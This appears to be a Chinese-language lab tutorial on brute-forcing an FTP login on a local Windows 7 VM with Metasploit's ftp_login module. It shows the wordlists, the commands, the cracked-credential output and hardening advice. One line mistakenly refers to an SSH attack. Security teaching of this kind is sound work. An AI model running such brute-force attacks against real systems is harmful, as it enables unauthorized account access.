【法律警告】根据《中华人民共和国网络安全法》第27条和《刑法》第285-286条，未经授权进行网络攻击、破解、渗透测试属于违法行为，最高可判处7年有期徒刑。本文所有技术内容仅限在完全授权的个人学习环境中使用。

1. 核心免责

本文仅用于网络安全合法学习、个人实验、系统加固，所有操作仅限本人拥有所有权的虚拟机与设备。严禁用于未经授权的入侵、攻击、渗透行为，一切非法操作自行承担法律责任。

2. 实验环境声明

文中所有攻击、破解、渗透步骤均在本地虚拟机中完成，不对任何第三方服务器、网站、设备进行测试。

3. 安全立场

本文以防御、加固、安全意识为核心，旨在提升读者的网络安全防护能力，共建安全网络环境。

前言:

本文将严格遵循“攻击原理→实操演示→风险总结→防御加固”的核心逻辑逐步展开，先借助Kali Linux自带的超级字典，对于内网靶机的FTP密码进行爆破操作，直观呈现弱口令带来的严重安全隐患，随后针对性讲解防火墙配置、密码加固等实用防御方案，完整还原网络攻防实战的标准化教学流程。

一、实验环境：攻防双方的准备

本次实验我们搭建了一套小型的模拟网络环境，分别部署攻击机与靶机，以此还原真实的攻防场景。

1. 网络拓扑

攻击机：采用 Kali Linux 系统，IP 地址为192.168.242.137，该系统集成了大量的渗透测试工具，我们将使用其中的 Metasploit 框架来发起针对 SSH 服务的攻击。
靶机：采用 Windows 7 专业版系统，IP 地址为192.168.242.130，作为本次实验的攻击目标，运行标准的 FTP 服务，模拟真实的生产服务器。

2. 环境配置

为了保证两台主机能够正常通信，我们将两台虚拟机的网络模式设置为桥接模式或 NAT 模式，确保彼此之间可以正常 Ping 通。

二、实验原理：暴力破解的底层逻辑

在开展实操之前，先明确FTP弱口令爆破的核心原理，理解攻击行为的本质，才能更好地掌握防御技巧。

FTP（文件传输协议）是网络中用于文件传输的标准协议，其设计初衷侧重文件传输效率，本身缺乏完善的身份验证加密机制——基础用户名/密码验证模式下，传输过程未对身份信息进行加密处理，且无有效的防暴力破解机制。当管理员设置弱口令（如简单数字、常见组合、生日等）时，攻击者可通过“字典爆破”方式，利用FTP协议的身份验证逻辑，将预设的用户名、密码组合逐一提交至目标FTP服务器，直至匹配到正确的身份信息，完成登录验证，从而突破服务器防御。

具体而言，破解过程主要分为三个核心步骤：

1. 探测目标：确认内网靶机FTP服务器的开放状态及端口（FTP默认端口为21），通过端口扫描工具（如nmap）验证目标服务的可访问性，确保攻击机能够与靶机的FTP服务建立连接。

2. 准备字典：创建两个字典文件（user.txt用户名字典、pass.txt密码字典），字典中包含预设的用户名和弱口令组合，本次实验中用户名字典涵盖dg、hfkh、1等28个用户名，密码字典涵盖123456、Haha0263@!等12个弱口令，为后续爆破提供数据支撑。

3. 爆破验证：利用Kali Linux中的Metasploit框架，调用FTP登录扫描模块，加载用户名和密码字典，设置相关参数后，工具自动循环提交用户名+密码组合至靶机FTP服务器，直至匹配到正确的登录信息，完成爆破过程。

三、破解的完整流程

【合规提醒】以下操作仅可在以下条件下进行：
- 你拥有目标系统的完全所有权
- 你已获得系统所有者的书面授权
- 操作环境为隔离的测试网络，与生产环境完全隔离
- 操作目的仅为安全学习和系统加固

以下结合实际操作命令，完整复现针对FTP服务的弱口令爆破测试过程，每一步均对应实操命令，确保初学者可直接参考复现。

步骤1：靶机环境预处理

关闭Windows 7靶机的系统防火墙，避免防火墙拦截攻击机的连接请求；同时在靶机上创建测试账户，用户名设为“1”，密码设为“Haha0263@!”，并确保该账户拥有FTP登录权限，且账户组合存在于我们准备的字典文件中，为后续爆破成功提供前提。

步骤2：攻击机准备字典文件

在Kali Linux攻击机中，通过nano命令创建用户名字典（user.txt）和密码字典（pass.txt），具体操作命令如下：

# 创建并编辑用户名字典user.txt
┌──(kali㉿kali)-[~]
└─$ nano user.txt

# 编辑完成后，按Ctrl+O保存，Ctrl+X退出，查看字典内容
┌──(kali㉿kali)-[~]
└─$ cat user.txt    
dg
hfkh
d
e
rtyu
jtdrsa
retryd
ygftd
rsea
ertyftdrsea
erhtjykygjfhdgsfa
fghjfhdsa
dfghgfdsa
sdfdghgf
sdasdfgh
fdsa
dfghjhhgfdsa
dfdghjgfdsa
ertyu
tyetretrytuy
iutyr
eaw
egrhtjy
jthrgef
er
htjykjrthge
1

# 创建并编辑密码字典pass.txt
┌──(kali㉿kali)-[~]
└─$ nano pass.txt

# 查看密码字典内容
┌──(kali㉿kali)-[~]
└─$ cat pass.txt
123456
hj
hg
tj
thrge
grht
jthrte
kjthr
gehykuyjt
hrgefwerhtjykuy
jthrge
Haha0263@!

字典说明：本次字典为自定义简易字典，实际渗透测试中可使用Kali自带的字典（如/usr/share/wordlists/目录下的rockyou.txt），或通过工具生成更全面的弱口令字典，提升爆破成功率。

步骤3：启动Metasploit框架，调用FTP爆破模块

Kali Linux默认预装Metasploit框架，无需额外安装，直接通过命令启动，具体操作如下：

# 直接输入msfconsole启动Metasploit框架（注：直接输入use命令会提示“command not found”，需先启动msfconsole）
┌──(kali㉿kali)-[~]
└─$ msfconsole

# 启动成功后，进入Metasploit交互界面，调用FTP登录扫描模块
msf > use auxiliary/scanner/ftp/ftp_login

补充说明：若直接输入use命令提示“Command 'use' not found”，属于正常现象，因为use是Metasploit框架内部命令，需先启动msfconsole进入框架交互界面，才能使用该命令。

步骤4：配置爆破参数

调用模块后，需设置目标IP、字典文件路径、爆破终止条件等参数，确保爆破过程顺利进行，具体命令如下：

# 设置靶机IP地址（RHOSTS参数，对应靶机IP：192.168.242.130）
msf auxiliary(scanner/ftp/ftp_login) > set RHOSTS 192.168.242.130
RHOSTS => 192.168.242.130

# 设置用户名字典路径（USER_FILE参数，对应我们创建的user.txt路径）
msf auxiliary(scanner/ftp/ftp_login) > set USER_FILE /home/kali/user.txt
USER_FILE => /home/kali/user.txt

# 设置密码字典路径（PASS_FILE参数，对应我们创建的pass.txt路径）
msf auxiliary(scanner/ftp/ftp_login) > set PASS_FILE /home/kali/pass.txt
PASS_FILE => /home/kali/pass.txt

# 设置爆破终止条件（STOP_ON_SUCCESS参数，设为true，找到正确账户后立即停止爆破，节省时间）
msf auxiliary(scanner/ftp/ftp_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true

步骤5：查看参数配置，执行爆破

参数配置完成后，通过show options命令查看配置是否正确，确认无误后执行run命令启动爆破，具体操作如下：

# 查看参数配置，确认所有必要参数已正确设置
msf auxiliary(scanner/ftp/ftp_login) > show options

# 启动爆破
msf auxiliary(scanner/ftp/ftp_login) > run

步骤6：爆破结果分析

爆破过程中，工具会逐一提交用户名与密码组合，失败的尝试会提示“LOGIN FAILED”，当匹配到正确的账户组合时，会提示“Login Successful”，并停止爆破（因设置了STOP_ON_SUCCESS true），本次实验爆破结果如下：

[*] 192.168.242.130:21    - 192.168.242.130:21 - Starting FTP login sweep
[!] 192.168.242.130:21    - No active DB -- Credential data will not be saved!
# 中间省略大量失败尝试（均提示LOGIN FAILED）
[-] 192.168.242.130:21    - 192.168.242.130:21 - LOGIN FAILED: 1:jthrge (Incorrect: )
[+] 192.168.242.130:21    - 192.168.242.130:21 - Login Successful: 1:Haha0263@!
[*] 192.168.242.130:21    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

结果解读：本次爆破成功获取靶机FTP服务器的正确登录账户——用户名为“1”，密码为“Haha0263@!”，与我们提前在靶机设置的测试账户一致，证明FTP弱口令爆破的可行性，也直观体现了弱口令带来的安全风险。

四、风险总结与防御加固方案

1. 核心风险总结

本次实验清晰呈现了FTP服务的核心安全隐患：FTP协议本身缺乏完善的身份验证加密机制，且无防暴力破解保护，当管理员设置弱口令（即使密码包含特殊字符，但用户名过于简单，仍属于弱口令组合）时，攻击者可通过字典爆破快速获取登录权限，进而可能导致文件被访问、数据泄露等安全风险，危害极大。

补充风险点：本次实验中，靶机关闭了防火墙，进一步降低了爆破难度；若真实环境中FTP服务器未开启防火墙、未限制登录尝试次数，弱口令漏洞的危害会进一步放大。

2. 针对性防御加固方案

结合本次实验的攻击逻辑，针对FTP服务的弱口令漏洞，提出以下实用防御方案，可有效提升服务器安全性：

（1）强化密码策略：禁止使用弱口令，要求FTP账户密码长度不低于12位，包含大小写字母、数字、特殊字符，且不与用户名、生日、手机号等个人信息相关，定期更换密码（建议每3个月更换一次）。

（2）开启防火墙防护：在服务器上开启防火墙，限制FTP端口（21端口）的访问范围，仅允许指定IP地址（如管理员办公IP）访问，禁止外部陌生IP连接FTP服务。

（3）限制登录尝试次数：配置FTP服务器，设置登录失败次数限制（如连续5次登录失败，锁定账户1小时），有效抵御暴力破解攻击，增加爆破难度。

（4）加密传输：放弃使用基础FTP协议，改用FTPS（FTP over SSL）或SFTP（SSH File Transfer Protocol）协议，对身份验证信息和文件传输过程进行加密，防止信息被窃取。

（5）定期安全检测：定期扫描FTP服务器，排查弱口令账户，及时删除无用账户、禁用闲置账户，定期更新服务器系统及FTP服务版本，修复已知安全漏洞。

五、实验总结

本次实验通过Kali Linux的Metasploit框架，完成了FTP弱口令爆破的完整实操，从字典准备、模块调用、参数配置到爆破执行，全程还原了渗透测试方的操作流程，直观呈现了弱口令漏洞的危害。需要再次强调的是，学习网络攻防的核心目的是认知安全风险、提升防护意识、维护网络安全，切勿利用所学技术触犯法律法规。

作为网络安全初学者，应始终坚守合法合规的原则，在自身搭建的模拟环境中开展实验，不断积累攻防经验，进而掌握更多安全防护技巧，为网络安全建设贡献力量。